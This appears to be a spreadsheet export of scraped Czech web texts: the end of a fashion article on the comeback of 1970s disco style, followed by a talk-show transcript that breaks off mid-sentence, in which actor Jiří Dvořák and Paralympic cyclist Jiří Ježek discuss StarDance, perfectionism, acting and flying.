ať už v podobě flitrového topu nebo blyštivých doplňků. V takovém outfitu budete hvězdou každé parketové show! Na méně formální události můžete vyzkoušet kombinaci kožené bundy a midi skirt. Doplňte to vysokými botami a výrazným náhrdelníkem, který váš look příjemně oživí. Nezapomeňte také na široké náušnice , které dodají outfitu šmrnc a jiskru. To je styl, který jistě zaujme a přitom je stále pohodlný pro celý večer. Abychom podtrhli duch 70. let, zde je tabulka s klíčovými prvky a doporučenými kombinacemi pro různé příležitosti: Příležitost Doporučený styl Kreativní nápady Disco večírek Lesklé a vyzývavé Flitry, světlé barvy, platformy Kavárenský večer Ležérní elegance Kožené bundy, midi sukně, výrazné šperky Festival Boho chic Batikované topy, volné kalhoty, klobouky Vždy pamatujte na to, že sebevědomí je nejlepší doplněk. Zkuste si užít každý moment v outfitu, který vyjadřuje právě vás, a nebojte se experimentovat. Móda je tu od toho, aby nás bavila! Příslušenství, které dodá šmrnc V každém outfitu, ať už jde o disco kouzlo nebo casual styl, je důležité mít na paměti moc správného příslušenství . S trochou kreativity dokážeme každý look povýšit na další úroveň. Stačí přidat pár kousků, které dodají šmrnc a zaujmou na první pohled. Co tedy do své skříně zařadit, abyste vystoupili z davu? Nejprve zvažte velké náušnice s třpytivými detaily. Jsou jako třešnička na dortu pro jakýkoli outfit. Vytvořte si arzenál několika párů v různých barvách a tvarech! Od kuličkových po extravagantní geometrické tvary – takové kousky mluví samy za sebe a skvěle doplní vaši disco estetiku. Dále zkuste sluneční brýle retro stylu. Velké skla ve tvaru motýlích křídel nebo kulaté brýle se skvěle hodí k mnoha stylům a zaručeně přitáhnou pozornost. Mezi další nepostradatelné doplňky patří sukně nebo šaty s flitry . Takové kousky vám umožní tancovat celou noc a zároveň se cítit jako hvězda. Vsaďte na živé barvy a rozmanité vzory, které zdůrazní vaši osobnost. Nezapomeňte ani na pásky , které dokáží umocnit siluetu a dodat celku zajímavý nádech. Můžete si vybrat od širokých, sexy až po tenké s výraznou sponou. Doplňky pro Disco Styl Příklady Velké náušnice Geometrické květové, třpytivé kroužky Sluneční brýle Motýlí tvar, kulaté brýle Sukně a šaty s flitry Živé barvy, různorodé vzory Pásky Široké, tenké s výraznou sponou S těmito doplňky v ruce se můžete postavit před zrcadlo a cítit se jako diva z 70. let. Inspirujte se svou oblíbenou ikonou a nebojte se experimentovat – tak to má být! Disco styl a udržitelnost módy V posledních letech se disco styl z 70. let vrací jako blesk z čistého nebe. Mnozí z nás si možná pamatují lesklé látky, platformy a výrazné účesy, které byly pro tuto éru typické. Avšak jak se tento styl objevuje na současných molech, jistě si klademe otázku: Jak se můžeme ujistit, že jeho návrat bude i udržitelný? Udržitelnost módy je dnes klíčovým tématem. Moderní návrháři se stále více zaměřují na šetrnost k životnímu prostředí. Zde je několik zásad, jak disco styl obohatit o prvky udržitelnosti: Recyklované materiály: Vyhledávejte kousky vyrobené z recyklovaných látek, které šetří přírodní zdroje. Lokální výroba: Podporujte místní značky, které dbají na etické výrobní postupy. Vintage kousky: Nákup z druhé ruky nejen ušetří peníze, ale také ochrání planetu před nadměrným odpadem. Představme si například disco šaty z recyklovaného polyesteru nebo džíny, které byly znovu zpracovány z textilního odpadu. Takové kousky nejenže zachovávají charakteristiku disco módy, ale také nám umožňují nosit naše hodnoty s hrdostí. I po letech můžeme vytvořit něco nového z něčeho starého a navodit tak příjemnou nostalgií bez odklonu od zodpovědnosti. Styl Možnost udržitelnosti Flitrové šaty Vyrobeno z recyklovaných flitrů Platformy Vyrobeny z veganských materiálů Účes s objemem Stylizace bez chemikálií Až se tedy příště rozhodnete pořádat disco večírek, nezapomeňte přinést kousky, které jsou nejen trendy, ale i přátelské k naší planetě. Vždyť kdo říká, že zábava a udržitelnost nemohou jít ruku v ruce? Jak se disco styl projevuje v populární kultuře Disco styl se v populární kultuře projevuje jako fascinující směs barev, rytmů a ikonických prvků z 70. let. Vzpomeňte si na velké brýle, třpytivé oblečení a nahrávky, které vás donutí se postavit a tančit. Když se podíváme na aktuální trendy, zjistíme, že disco opět ožívá. Je to jako když se váš oblíbený hit z mládí objeví na rádiu a vy si najednou vzpomenete, jak báječně jste se na něj houpali v obýváku. Dnes jsme svědky přítomnosti disco prvků v módě, hudebních videích i společenských akcích. Móda: Velké řetězce módy se plně inspirují tímto stylem a designéři často připomínají důvody, proč se jednoduše nemůžeme odtrhnout od volných kalhot, lesklých látek a extravagantních střihů. Hudba: Rytmy disco se vrací na festivaly a party, dokonce i moderní interpreti jako Dua Lipa nebo Lizzo pravidelně sahají po těchto hudebních prvcích, aby svým fanouškům přinesli nostalgické pocity. Film a televize: Seriály jako “Stranger Things” nebo “The Get Down” znovu objevují kulturu disco a přinášejí tomuto stylu nový život pro mladší generace. Přes samotnou estetiku disco styl v populární kultuře neusíná na vavřínech. Mnozí umělci se uvnitř svých děl snaží posunout hranice, experimentují s novými formami a přitom spotřebovávají nostalgii starších generací. Samozřejmě, že ne všichni si tuto revizi užívají; někteří tvrdí, že moderní disco vyprázdňuje původní kouzlo. Ale nezapomínejme, že kultura se neustále vyvíjí – je jako dobré víno , které s časem získává nový charakter. Neustálý výzkum a diskuse o tom, jak disco styl formuje a ovlivňuje naši každodenní kulturu, ukazují rozmanité úhly pohledu. Někteří odborníci poukazují na vliv hudby a módy na naše emocionální prožívání, zatímco jiní varují před komercializací tohoto stylu. Pokud si tedy chcete na chvíli užít atmosféru disco, neváhejte nasadit své nejlepší oblečení, pustit oblíbenou skladbu a prostě tančit. Občas je ten nejlepší způsob, jak oslavit minulost, dnes a tady! Osvojte si disco styl pro moderní den Je čas obléknout se do stylu, který si podmanil taneční parkety v 70. letech. Disco styl se vrací a nabízí nám nejen možnost vyjádřit svou kreativitu, ale i příležitost znovu zažít radost z módy, která byla plná barev a výrazných vzorů. Ať už plánujete večer ve městě nebo jednoduše chcete osvěžit svůj šatník, existuje několik klíčových prvků, které by neměly chybět. Metalické barvy: Zlaté, stříbrné a bronzové odstíny dodají vašemu outfitu jiskru, která rozhodně upoutá pozornost. Vysoké pasy: Jednoduché kalhoty s vysokým pasem nebo široké džínové nohavice mohou vaši postavu krásně zvýraznit a dodají vám retro nádech. Oslnivé doplňky: Velké náušnice, výrazné náramky a skvostné kabelky – vše, co může vaši image doplnit o špetku extravagance. Nezapomeňte také na obuv! Platformy a boty na vysokém podpatku jsou nezbytností, které vás vyzdvihnou doslova i obrazně. Pokud si na ně netroufáte, nebojte se zvolit stylové a pohodlné tenisky. Nemožné? V 70. letech to bylo naprosto normální, tak proč ne dnes? Klíčové Elementy Disco Stylu Tipy na Stylizaci Jemné a lesklé materiály Kombinujte je s matnými prvky pro vyváženost. Výrazný make-up Použijte glitter a pestré barvy pro odvážné líčení. Vytvořte vrstvený look Nápaditě kombinujte různé vrstvy oblečení. Vyzkoušejte si diskotékový styl a nechte se unést atmosférou, kterou tato móda přináší. Když se budete cítit skvěle, budete zářit na každém kroku – ať už se chystáte na večírek, nebo si jen tak vyrazíte do města. Pamatujte, že osobní styl je o tom, co vás dělá šťastnými, tak se nebojte experimentovat a najít to, co sedí právě vám! Otázky &amp;amp; Odpovědi Q&amp;amp;A: 70. léta módy – Disco styl, který se vrací Otázka 1: Co charakterizuje disco styl z 70. let? Odpověď: Disco styl, který dominoval módě 70. let, se vyznačuje jasnými barvami, lesklými materiály a výraznými vzory. Klíčovými prvky jsou vystříhané kalhoty, široké nohavice, volné blůzy a kombinézy, často doplněné o výrazné šperky a vysoké podpatky. Velkou roli hrají také odkazy na tehdejší hudební kulturu, jako jsou flitry a třásně. Otázka 2: Jaké jsou hlavní trendy, které se v disco stylu opět objevují dnes? Odpověď: Dnes se k disco stylu vrací nejen volné kalhoty a lesklé materiály, ale také barevné a odvážné vzory. Nahrává tomu návrat oversized kousků a kombinace různých textur. V současné módě zaznamenáváme také revival flitrových topů, mini sukní a platformových bot. Důraz na individualitu a sebevědomí je dnes stejně důležitý jako před půl stoletím. Otázka 3: Proč se disco styl vrací do módy nyní? Odpověď: V posledních letech jsme svědky obnovy zájmu o minulost, což se odráží i ve světě módy. Lidé hledají útěchu ve známých a osvědčených trendech, zatímco disco styl vyjadřuje radost a svobodu, což je v dnešní době velmi žádoucí. Také popularita retro stylu na sociálních médiích, zejména na platformách jako TikTok a Instagram, významně přispívá k jeho návratu. Otázka 4: Jak mohou lidé začlenit disco styl do svého každodenního šatníku? Odpověď: Začlenit disco styl do každodenního šatníku je jednodušší, než se může zdát. Stačí začít s jedním výrazným kouskem, například flitrovým topem nebo širokými kalhotami. Klíčem je mixovat moderní kousky s vintage najde. Doplňky, jako jsou velké náušnice a barevné boty, také pomohou vytvořit stylový look. Nebojte se experimentovat s barvami a texturami! Otázka 5: Jaký je vliv disco stylu na dnešní módní návrháře? Odpověď: Mnozí současní návrháři se inspirovali disco obdobím, které ovlivňuje jejich kolekce. V posledních letech jsme viděli návrhy inspirované estetickou 70. let z různých předních módních domů. Tento styl se objevuje na přehlídkových molech i v ready-to-wear kolekcích, což dokazuje, že disco ovlivňuje současnou módu více než kdy jindy. Otázka 6: Jaké jsou nejvýznamnější módní ikony 70. let a jaký vliv měly na disco styl? Odpověď: Módní ikony 70. let, jako jsou Donna Summer , Bianca Jagger nebo Farrah Fawcett , výrazně ovlivnily disco styl. Tyto osobnosti nejen že propagovaly podporu extravagantního a barevného oblečení, ale také se staly vzory pro mnoho mladých lidí. Jejich styl se stal inspirací pro současnou módu a mnozí návrháři se snaží zachytit jejich duch a atmosféru této doby. — Tímto způsobem se disco styl stává nejen nostalgickou vzpomínkou, ale i aktuálním projevem módní kultury dneška. Závěrečné myšlenky Závěrem článku “70. léta módy: Disco styl, který se vrací” je jasné, že disco styl není jen pouhým vzpomínkovým retro trendem, ale skutečným vyjádřením svobody a kreativity, které i dnes může rozjasnit náš šatník! Pokud se nebojíte experimentovat s barvami, třpytkami a odvážnými siluetami, nastal ten pravý čas ukázat světu svou disco duši. Pamatujte, ako říká klasik: „Šaty tvoří osobnost“ – a co může být osobnější než oslnivé kousky, které se na parketu budou lesknout stejně jako vaše sebevědomí? Tak nasaďte své platformy, zapněte oblíbené disco hity, a buďte připraveni na to, že se z vás stane hvězda, ať už ve svém obýváku, nebo na večírku. Vstupte do světa, kde platí jedno pravidlo: čím více lesku, tím lépe! Nenechte si ujít: Henley Royal Regatta dress code: Jak se obléknout na prestižní dostihy Remix second hand: Skutečné zkušenosti zákazníků vás překvapí! Dovolená v Chorvatsku : 10 tipů pro aktivní a zdravý pobyt u moře Edo traditional attire: Nejlepší tipy a trendy, které musíte znát! Second hand Doubrava: Doubravské secondhandy - průvodce udržitelnou módou v malém městě Rubrika transition_slide Móda</t>
  </si>
  <si>
    <t>26</t>
  </si>
  <si>
    <t>211</t>
  </si>
  <si>
    <t>20241001_75_3001293563_c5e8968883aca1b02c9c.html</t>
  </si>
  <si>
    <t>c5e8968883aca1b02c9c</t>
  </si>
  <si>
    <t>Jak na Star Dance? Vydrž s nervama, radí Dvořák Ježkovi! Jeden kolega se zamkl v šatně!</t>
  </si>
  <si>
    <t>Jak na Star Dance? Vydrž s nervama, radí Dvořák Ježkovi! Jeden kolega se zamkl v šatně! Před prvním kolem, když měl jít na scénu, tak se zamknul v šatně. Tohle jsem přesně nechtěl slyšet. Až jako teď si teprve jako trošku zpytuju svědomí, do čeho jsem se přihlásil.Co to děláš? Vždyť to není operace mozku. Je to jenom taneční soutěž. Ráno usínáš, teda ráno usínáš. Mně nestačilo stát se nejlepším mezi těma paralympionikama, já jsem chtěl závodit se zdravýma závodníkama. Některý režiséři připomínkují i derniérou Se to zvrhlo. Já jsem taky nechtěl bejt herec někdy, a to byl nějakej omyl. Když jedu kolem letiště a cejtím ten spálenej karosin, tak, tak mi to jako voní. Já hrozně rád vařím, ale v podstatě nerad jím. Přijdu domů a uvařím a ještě než to sním, tak to musím všechno umejt, všechno uklidit. Národ, který zapomene svou historii, je nucený ji opakovat. Já jsem to viděl v kině dvanáctkrát. Filmy se Segalem, jak tam všem rozbije hubu. Jako neuvěřitelný, to je tak krásný, u toho člověk vůbec nemusí přemejšlet. Já jsem Michael a toto je můj Mashup. A hosty letního Open Air Mashapu, který měl být původně na pražské náplavce, ale vzhledem k povodním jsme se přesunuli do sucha a do bezpečí Café Husovka, jsou: herec Jiří Dvořák .Dobrý den. Dobrý den.A cyklista, šestinásobný paralympijský vítěz Jiří Ježek . Ahoj, dobrý den. Ahoj, krásný den.A srdečně také vítám diváky, kteří nás našli a našli tento přesunutý Mashup a přišli sem do Café Husovka. Tak dobrý den i vám. Můžete si zatleskat. Dobrý den. Tak pánové, já vždycky v Mashupu hledám, co mají hosté společného. No, a u vás. Teď jsem zvědav, na co myslíte nebo co vás takhle napadlo, jak jste se tak krásně na sebe podívali. Ale pochopitelně nemůžu nezačít tím, že oba máte společné Stardance, dokonce společnou taneční partnerku. Jiří Dvořáku , vy jste vyhráli Stardance, Jiří tebe Stardance čeká, pane Dvořáku , co byste poradil Jiřímu? Tak to ještě před startem soutěže. No, tady se radí velmi těžko, ale hlavně vydržet s nervama, protože ty tréninky ještě docela jdou, ale ve chvíli, kdy do toho nastoupí ty přímý přenosy, tak jako člověk má pocit, když slyší tu znělku, že chce utéct a už vůbec před tu kameru nevylézt. A vím, že jeden kolega, skoro slavný moderátor, který účinkoval ve Stardance, tak před prvním kolem, když měl jít na scénu, tak se zamknul v šatně, a to je člověk, který je přímými přenosy opravdu kovaný a vůbec tam nechtěl vylézt. Takže jako udržet ty nervy a pak, když se začne tančit, tak už to stejně jako nic jiného to nezbyde, než to dotančit, ale než to začne je to úplný peklo. Tak tohle jsem přesně nechtěl slyšet, protože mně přijde peklo, už jenom ty tréninky, tak jestli to je teprv předpeklí, tak v tom pekle teda bude asi hodně horko, no. A bude hůř tedy. A Jiří, ty by se na něco Jiřího Dvořáka zeptal, takhle ještě před startem? Máš unikátní možnost zeptat se vítěze jedné z řad. No, já jsem strašně rád, že Jirka s Lenkou vyhráli, protože já už nemám ten tlak, že bych musel být tím partnerem Lenky a ona by třeba 3, 4. řady Stardance čekala na to, až s někým vyhraje a já bych nechtěl mít ten tlak, že to bude zrovna se mnou, protože já věřím, že když dostala mě, tak věděla, že to vítězství rozhodně se mnou neobhájí, takže chci Jirkovi poděkovat, že už Lenku doprovodil na ten piedestal téhle té soutěže.A ona doprovodila spíš mě. No, nebo tak. Dobře, dobře, no, šli jste spolu. Ten pár, to jsou vždycky dva, a každý do toho přinese to svoje, ale já mám právě radost z toho, že se můžeme dneska potkat a že si můžeme ty zkušenosti. Škoda, že tady Lenka dneska není, ale ona říkala schválně, že asi nepřijde, aby nás neuváděla do rozpaků. No. Myslím, že vám budeme fandit o pátou. Můžu, no, za nás, za oba, že budete naše želízka v ohni. Ale Jiří tys nevyužil té možnosti, jestli se Jiřího Dvořáka nechceš na něco zeptat. No, utečeš mi z toho. Neuteču. Rozhodně ne. Mně totiž strašně baví to, že Jiří Dvořák má rád to místo, kde já jsem celý život žil, kam jsem hrozně rád chodil do hospody na Ural a kde i třeba s mojí manželkou jsme se potkávali, protože to náměstí v těch Dejvicích je trošku takový venkov, tam se lidi potkávají, tak mě zajímá, co tě tam přivádělo, jestli k tomu máš nějaký vztah, jako že jsi tam bydlel nebo. No. Moje bývalá partnerka bydlela kousek, takže my jsme tam chodili na jídlo nebo na pivo nebo něco takového a hlavně tam mimo jiné bydlel i můj kamarád Michal Hrůza , se kterým jsme se tam potkávali a vždycky tam to bylo hrozně příjemný. A máš pravdu v tom, že to je jako nějak úplně vytržený z toho městského života, je takový v podstatě vnitroblok, když to řeknu, jo, a je to tam hrozně příjemný a byli tam příjemný lidi, no, takže, a to jsem nevěděl, že tam bydlíš, vidíš. To je legrační, jak je ten svět malý, protože Michal Hrůza vlastně žil s mojí sestřenicí a byl takový můj vlastně přiženěný bratranec, takže my jsme se tam všichni takhle jakoby potkávali a žili jsme. A co je hodně jako pro mě emočně strašně silný, že Michal Hrůza , když on měl ten úraz těžkej, v té Ostravě , tak já v té době jsem se zotavoval z podobně těžkého úrazu, který jsem měl v Americe , a vlastně když já jsem se z té Ameriky vrátil a tu rekonvalescenci jsem tady začínal v Praze , tak jsme spolu chodili jak dva válečný invalidi do Stromovky. Šli jsme takovou couravou chůzí, nesměli jsme chodit rychle. A strašně jsme se smáli, že přestože nám ještě není 50, tak jsme vypadali, jako když už jdeme do důchodu. No, já jsem mimochodem teda myslel ten dotaz, jestli se chceš na Jiřího zeptat něco jako právě ohledně Stardance. A ty se hned šel na Puškinovo náměstí a na hospodu, ale tak v pořádku. Pojal sis to, pojal sis to podle svého, ale zaujalo mě právě Jiří, že ty jsi řekl Jiří Ježek, teď mám na mysli, miluju show, kostýmy a převleky, chtěl bych být herec nebo zpěvák, ale na to bohužel nemám talent, tak ale to mě přijde, že to teda Stardance se ti musí vyloženě líbit a hodit, že tam si asi i kostýmů a převleků užiješ měrou vrchovatou. Tak to byl vlastně ten hlavní důvod nebo jeden z těch hlavních důvodů, proč jsem tu nabídku vzal. Protože já za prvé tu soutěž nebo tu show sleduju vlastně od prvního ročníku. Já jsem to fakt měl strašně rád, moje manželka se na to dívala, spousta našich známých měla nebo má děti, které se věnují jako tomu závodnímu tanci, a strašně tuhle tu soutěž prožívaly, takže já vlastně každou sobotu jsem se na to díval už od té první řady a čím víc tím procházeli moji kamarádi nebo známí, kteří mi o tom vyprávěli, jak je to úžasná atmosféra při těch přípravách. Pak samozřejmě i při těch přenosech. Tak ne, nechci říct, že bych jako snil o tom, že dostanu tu nabídku, ale říkal jsem si, že by to bylo neuvěřitelně jako pro mě obrovská čest tuhle tu soutěž mít možnost absolvovat a když ta nabídka přišla, tak já jsem fakt neváhal ani vteřinu. Já jsem řekl okamžitě, jako do toho jdu. Až jako teď si teprve jako trošku zpytuju svědomí, do čeho do čeho jsem se přihlásil. Protože ono je to opravdu obrovský výstup z komfortu, zvlášť pro někoho, kdo jako není herec, není zpěvák, není zvyklý jakoby ty emoce prožívat. A navíc my sportovci, a potvrdil mi to třeba David Svoboda nebo i loni Vávra Hradílek, máme takovou tu, v tomhle případě až jako přílišnou snahu bejt perfektní, a ono to v tom tanci prostě úplně nejde, jo, a každý den z těch tréninků odcházím s takovou obrovskou jako depresí, že jsem totální idiot, že nejsem schopný jako to, co po mně Lenka chce hned na tu první hodinu bejt schopnej zatancovat, takže to je těžký. No, a já to teď s dovolením posunu, pane Dvořáku , protože má to herec třeba při zkoušení nebo potom už i při reprízách, taky ten pocit, jako že chce být perfektní a že to je někdy možná na škodu, že mít to jako trochu, a teď neříkám flákat, to bezesporu ne, ale mít to vlastně trošku na háku, že může být užitečné v tom herectví. Já napřed trošku zareaguju teda na Jiřího, protože já jsem, to se netýká jenom sportovců, já jsem na tom byl úplně stejně a my jsme s tou Lenkou v podstatě toho půl roku měli jedinou jako fakt krizi, kdy jako já jsem fakt maximalista a perfekcionista a ona Lenka vždycky mě pochválila. Já si říkal ne, bylo to blbě. Ona říká ne, vždyť to bylo dobře. Říkám, ne, bylo to blbě, není to prostě ono. A už to došlo tak daleko, že Léňa se jednou dokonce rozplakala, jo, potom byla úplně, jsem ji takhle zlikvidoval, já si říkal a dost. Tak teďka tři dny prostě se dáme oraz. Já si to musím v té hlavě nějakým způsobem srovnat. Šel jsem domů a říkal jsem si, co to děláš? Vždyť to není operace mozku, je to jenom taneční soutěž, jako, vždyť ta holka dělá, co může a ty máš tady tyhle výstupy. A takhle mi to fakt v té hlavě cvaklo a od té doby to bylo úplně v pohodě, takže tímhle se jí ještě omlouvám zpětně po těch letech, že jsem tímto způsobem ji takhle zlikvidoval asi na víkend. Jenom, pardon, to bylo, ve které fázi? To bylo ještě tréninky, to byly tréninky jako ještě před přenosy to bylo. No, ale fakt jako si to člověk, jak chce nějak jako, aby to nebylo blbý a nechce se ztrapnit, atd., tak prostě pořád hledá na sobě nějaký chyby, který samozřejmě tam jsou logicky a budou, protože nejsme tanečníci, ale to bylo, to bylo tehdy hrozný. No. A co se týče toho jeviště, tam je to, nikdo nevystoupí na jevišti nebo před kameru s tím, aby byl blbý, aby byl prostě špatný. Každý to chce udělat co nejlíp, to je jasný, někdy se to povede, někdy se to nepovede, to se tak stává, jako někdy se vyhrává, někdy se prohraje, to tak je. A na tom divadle to ještě docela složitější o tom, že třeba když... Máte nějakou reprízu nějakého titulu třeba po měsíci a půl to hrajete, tak ty nervy jsou strašný, a to mimo jiné byl také jeden z důvodů, proč jsem z toho divadla odešel, protože já už jsem na to neměl normálně nervy, protože když hrajete Jindřicha IV . jednou za měsíc a půl, Saliériho jednou za měsíc, Ideálního manžela jednou za dva měsíce, tak už jako jdete na to jeviště s dvěma pocity, ať to všechno řeknu, a ať už to proboha skončí. A v tu chvíli to nemá smysl. Ale může ten perfekcionismus, nebo ta touha po dokonalosti, být pro herce jako svazující nebo může z toho pak čišet třeba i nějaká jako urputnost? Jako že by byl v křeči?No, třeba, já nevím. Může to, tak záleží, jak ten člověk disponuje jakým, pardon, že to řeknu takhle, ale hereckým talentem. a nakolik dokáže ovládnout ty nervy a tu odpovědnost, protože to se nedá zastavit. Natáčení, dobře, dám to ještě jednou, ale to na divadle, to si troufnou jenom velcí frajeři a jenom v některým žánru. Ale neděje se to často, takže tam prostě naskočíte do vlaku a buďto prostě působíte uvolněně nebo nepůsobíte uvolněně. No. Jiří, kam se dá perfekcionismus šponovat v cyklistice nebo obecně teda ve vrcholovém sportu? Protože nevím, novinářská příprava prostě nikdy nekončí. Před každým rozhovorem má člověk pocit, že ještě si mohl načíst víc, ještě se mohl připravit víc. Jak to má vrcholový cyklista, jako šel jsi na závody s tím, jako ještě se mohl víc trénovat nebo lépe trénovat. No, to se právě odrazí v tom tréninku, že člověk do toho dává. to absolutní maximum, kterého je schopný. Navíc připravuje se i v hlavě. Hledá nejmenší stébla trávy, kterých se může chytit, aby byl lepší aspoň o ten centimetr potom v tom cíli, před tou konkurencí. Takže tam ten perfekcionismus se vlastně odráží v té přípravě a pak, když už jdeš do toho závodu, tak tam v podstatě nemáš šanci to nějak ovlivnit. Tam už vydáš za sebe maximum už jenom z toho klasického soutěžního modelu, že chceš porazit ty, který jedou vedle tebe, a oni samozřejmě chtějí porazit tebe a kdo je ten den nejsilnější, ten vyhraje, takže tam už to člověk moc neovlivní. Ale právě ten perfekcionismus je v té přípravě, že ty ráno usínáš, teda ráno usínáš, večer usínáš a ráno se probouzíš s tím, co jde udělat líp. A nejhorší je to čtyřletý období třeba, kdy je olympiáda, že ty už ty 3,5 roku dopředu přemýšlíš na ten den, kdy chceš být jako nejlepší na světě, a to je potom jakoby těžký udržet tu koncentraci ty 3,5 roku se takhle připravovat. No, a měl jsi to tak, když si závodil, že když jsi trénoval, já nevím, osm hodin, tak sis řekl, měl jsem trénovat 10, když jsi trénoval 10, tak sis pak řekl, měl jsi 12, ale to přece nejde donekonečna. Jako den má 24 hodin. Tělo má nějaké limity. Ono to tělo právě ti ty limity potom ukáže, a to je to, z čeho se člověk jakoby poučí a řekne, už jsem došel za hranu. Někdo to má, já nevím, v podnikání, že vyhoří někdo, já nevím, začne pít. Herci třeba nějakým způsobem emočně jsou úplně vyždímaný, až musí zastavit prostě někdo zvenku a říct, hele, dost už prostě tohle to prostě nemůžeš, přes tuhle tu hranu nemůžeš jít. A mně se to stalo samozřejmě v té kariéře několikrát, protože já navíc ještě díky tomu handicapu, já jsem byl první na světě, kdo hledal tu pozici, kam až s tím handicapem v té cyklistice může zajít a mně nestačilo stát se nejlepším mezi těma paralympioniky, já jsem chtěl závodit se zdravými závodníky. Nejdřív tady na lokální úrovni, pak na mezinárodní úrovni, pak, když jsem se díval na Tour de France a tyhle ty závody v televizi, tak jsem si říkal, pojď to zkusit, kam až jako se můžeš dostat a když jsem najednou stál potom na startovní čáře a vedle mě stál aktuální mistr světa a vítěz Tour de France loňského roku, tak jsem si říkal, tak ty jo, tady už to dál nikam nejde. A teprve ten moment jsem byl spokojený, ale to je, to každý v té svojí profesi si najde, jo. Ty máš tenhle ten pořad, Jirka hrál ve filmech nebo hrál na divadle v rolích asi, který jako si vysnil nebo asi se dostal na nějakou úroveň nebo poblíž toho, co by chtěl hrát, a to je potom jako ta vnitřní spokojenost, která si člověk řekne: jo, stálo to za to, stálo to za to být až téměř magor v té přípravě. Pane Dvořáku , je výhoda v divadelním herectví, v tom, že tam je prostě ten deadline jasně dáno při zkoušení tou premiérou a že samozřejmě pak každá repríza je jiná, to představení si nějak jako sedá a mění postupem času, jasně, ale že třeba u toho filmového nebo televizního herectví tam těch jetí může být asi ne neomezeně, ale může jich být víc a že po každém záběru si můžete říct, ale ještě jednou, já to řeknu nebo zahraju líp? No, v tom divadle je vždycky málo času, vždycky. Já mám pocit, že to bylo jenom v činoheráku tady v Praze , anebo možná i v Dejvicích , a to si nejsem úplně jistý, že oni si řeknou, až to bude hotový, tak to půjde před lidi. Což v normálním repertoárovým divadle nejde. Takže výhoda to je, že to prostě musí jít ven a pak samozřejmě na každý repríze, vždycky říkám, že já jsem byl nejhorší na premiéře, protože potřebujete ty lidi a naučit se poslouchat to publikum, na co reaguje, na co nereaguje, co funguje, co nefunguje, takže se pořád pracuje na té roli během celého toho života té inscenace a v podstatě ta práce končí až na té derniéře. U toho filmu a navíc takhle na tom divadle je to, že to zkoušíte, že máte nějaký čas, kde se to zkouší, ty věci a situace. U toho filmu máte ve srovnání s divadlem minimum času, jo, že to je ten obraz, máte ten jeden obraz, který může mít třeba 4, 5 stran, tak máte, dejme tomu, hodinu, hodinu a půl. Takže těch, a nejsme v Americe , protože já vím, že myslím, že Kubrick, když točil Shining, tak je v Guinnessově knize rekordů, že jeden záběr s jednou herečkou, a já mám pocit, nevím, jestli to číslo řeknu přesně, ale jednu klapku dělali asi 865 krát, což si tady nikdo samozřejmě nemůže dovolit. Oni tam třeba jednu scénu točili 14 dnů, nebo tři týdny. Za tři týdny se tady natočí film. Takže tam u té kamery je to takhle, že tam je to prostě strašně scuknutý, ale tam je ta výhoda, že se to natočí a režisér řekne třeba pojďte na kopr, což znamená, pojďte se podívat, jako ono to promítne ten záběr a říká, tohle je blbě, tohle je blbě, tady běž jinam atd. a takhle to, tady si tu kameru pohlídej víc, pojďme znovu. Takže vy v podstatě máte okamžitě nějakou reflexi a můžete to nějakým způsobem spravit. Na divadle se na sebe podívat nemůžu. Jedině ze záznamu, ale to už je pozdě. No, takže tak. Ale večer, když jdete po představení domů, jako promítáte si v hlavě jako dneska tenhle dialog, tahle replika, tenhle monolog. Mohl jsem to říct jinak nebo příště si musím dát pozor tady na nějakou část. Někdy jo, někdy ne, někdy jsou tam tzv. dozory, kdy chodí prostě režisér se podívat jako na ty reprízy a pikantní je, že některý režiséři připomínkují i derniéru. Říká, ale už se to nehraje, už se to někdy hrát nebude. Říká, to nevadí, ale já ti to musím ještě říct a takhle, takže to je takový komický. Ale samozřejmě člověk si to tak promítá a nějak mu to jede v hlavě. Třeba nemůžu nebo jsem nemohl nikdy, když jsem dohrál a jel jsem domů, tak že bych si šel hned lehnout, tak to prostě, to nejde. Ta hlava prostě jede dál vždycky 2, 3 hodiny po představím a pak jsem teprve zabral, protože to prostě nějak dojíždí. Ale já si myslím, že právě v tom je jakoby to kouzlo těch dobrých, že nikdy nejsou spokojený. Samozřejmě nesmí to překročit tu hranici, o který mluvil Jirka třeba v tom tanci, protože mně se strašně teda jako líbilo a děkuju za to, že si přiznal tuhle tu krizi s tou Lenkou, že to bylo vlastně daný tím, že ty jsi sám nebyl spokojený a ona už třeba dávno by řekla, to je super. Jsem ráda, že jsi se dostal do téhle té úrovně, pojďme dál. A já to mám úplně taky a jediný problém, který mezi sebou jako občas máme, že jinak ty tréninky jsou super, strašně se smějeme, hrozně si rozumíme, ale jediný, kdy cítím jako nějakou třenici, je to, že já udělám tu chybu, že řeknu: no, ještě to nebylo dobrý. A Lenka je pak jakoby naštvaná nebo ne naštvaná, mrzí jí to, že ona do toho dává tu emoci a já vlastně nikdy neřeknu, že mám dobrý pocit. Takže taky jsem měl tuhle tu vnitřní sebereflexi jeden den, kdy mi to řekla a já jsem si v duchu nafackoval, pak jsem si nafackoval opravdu až doma, když to neviděla a řekl jsem, že už tohle to nikdy dělat nebudu a teď jsem spokojený a šťastný za každý krok, který udělám a vlastně si toho vážím a je to i pro ni poděkování, že prostě do toho tu svoji energii dává. Je tady rubrika, která se jmenuje Hádej, kdo? Kdo by byl pilotem, kdyby nebyl tím, čím je? Kdo by chtěl být pilotem? Jiří? Správně. A teď ještě jedna ku jedné zkuste.Ježek? Ne. Jiří Dvořák by chtěl být pilotem, je to tak? Já bych mu to letadlo připravoval, protože já jsem chtěl být letecký mechanik. Ale tohle je teda výborná dramaturgie Michaeli, to je teda super. Teď bych se rád tvářil, že to je úmyslná dramaturgie. Ne, ale je to Jiří tak, že jste opravdu, že by vás to lákalo, že to létání a být pilotem, že to je vášeň?My jsme s tatínkem sbírali knížky o lítání, speciálně o RAF a čeští piloti v Anglii za druhý války. Měli jsme na metry těch knih a pak jsme lepili i jako takový ty kity, ty letadýlka a vždycky jsem chtěl být pilot, ale nějak se to zvrhlo, protože tehdy se na pilota v podstatě dalo studovat jenom, myslím, že to bylo v Žilině , na vysoký vojenský škole a já jsem nechtěl být nějak voják, takže se to zvrhlo. Já jsem taky nechtěl být herec nikdy, to byl taky takový omyl, ale je fakt, že mám dost kamarádů pilotů a teď, když jsem točil nějaký film, který se jmenoval Narušitel, tak oni mi to kluci jsem tam půjčí nahoře, ale jenom takový jako lehký zatáčky. Ne, že bych dělal nějakou vysokou pilotáž. Letecký průkaz jste si nikdy nechtěl udělat? Dneska pršelo, no.Máte? Dneska pršelo, no. Nemůžu říct přece, že nahoře řídím, když nemám řidičák. Ne, ne, ne, ne, ne, ne. Jestli 